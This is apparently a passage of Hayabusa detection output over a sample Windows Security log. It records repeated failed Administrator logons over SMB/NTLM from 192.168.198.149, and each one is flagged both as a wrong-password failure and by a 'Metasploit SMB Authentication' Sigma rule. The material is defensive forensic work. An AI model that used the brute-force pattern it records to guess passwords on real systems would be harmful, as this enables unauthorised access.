NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
